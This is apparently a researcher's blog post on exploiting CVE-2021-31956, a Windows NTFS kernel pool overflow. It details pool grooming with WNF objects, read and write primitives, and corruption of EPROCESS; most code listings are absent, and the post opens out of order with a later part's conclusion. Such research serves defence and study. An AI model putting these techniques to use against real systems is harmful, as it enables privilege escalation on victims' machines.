Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards β especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:
This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.
At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.
Acknowledgements
Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.
Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.
Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.
Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.
Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.
As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.
One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!
This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.
Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.
Vulnerability Summary
As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driverβs NtfsQueryEaUserEaList function:
Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.
There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.
The out_buf_length is then decremented by the size of the ea_block_size and its padding.
The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
This is because each Ea Block should be padded to be 32-bit aligned.
Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.
At the first iteration of the loop we could have the following values:
By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.
The documentation for the Zw version of this syscall function is here.
We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.
In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.
Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.
The interesting things from this vulnerability from an attacker perspective are:
1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain. 2) The overflow is linear and will corrupt any adjacent pool chunks. 3) The attacker has control over the size of the pool chunk allocated.
However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a βgoodβ memory corruption:
So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?
The function NtSetEaFile has the Zw version documented here.
The Buffer parameter here is βa pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be setβ.
Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.
There is then the padding length of 2, with the second extended attribute starting at 20 offset.
The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.
This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.
If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.
So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.
Understanding the kernel pool layout on Windows 10
The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.
Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four βbackendsβ:
Low Fragmentation Heap (LFH)
Variable Size Heap (VS)
Segment Allocation
Large Alloc
I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:
This is due to the size of the allocation fitting being below 0x200.
We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:
bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.
This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.
It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation
By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:
This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.
We can however also adjust both the size of the allocation and the amount of data we will overflow.
As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):
NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94
This ends up being allocated within a 0x70 byte chunk:
As you can see it is therefore possible to influence the size of the vulnerable chunk.
At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).
Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.
WNF Introduction
The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.
Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.
I donβt want to duplicate the background here, so I recommend reading the following documents first to get up to speed:
Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.
Controlled Paged Pool Allocation
One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.
There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.
Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.
I started off by looking through the primary structures associated with this feature and what could be controlled from userland.
One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:
Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.
The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:
This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.
Controlled Free
The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.
Thereβs also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up freeβing our allocation.
Whilst researching this area, I was able to reuse the freeβd chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.
Relative Memory Read
Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?
Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:
The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:
At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.
We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:
We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.
So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.
_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes
As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.
Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.
By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.
By setting the BlockSize to a different size, once the chunk is freeβd using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.
Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.
Finally, we can then trigger corruption again and therefore corrupt our more interesting object.
Initially I demonstrated this being possible using another WNF chunk of size 0x220:
As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writeβs.
Using this layout we can corrupt the PipeAttributeβs Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.
Diagramatically we end up with the following memory layout for the arbitrary read part:
Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.
The journey to arbitrary write
After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.
Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:
We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.
Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:
I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.
There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.
StateName Corruption
For a successful StateName lookup, the internal state name needs to match the external name queried from.
At this stage it is worth going into the StateName lookup process in more depth.
The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.
As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.
i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.
Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.
One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNameβs of the objects which have been heap sprayed, you donβt necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.
However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structureβs StateName to be.
It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.
As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.
In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.
Security Descriptor
One other challenge I ran into whilst developing this exploit was due the security descriptor.
Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.
Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.
I then attempted to provide the fake the security descriptor with the same values. This didnβt work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).
After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:
Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.
Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.
As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.
To recap, the following steps were needing to be taken:
1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required. 2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess. 3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.
So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:
We can then demonstrate corrupting the EPROCESS struct:
These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.
The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.
Summary
In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.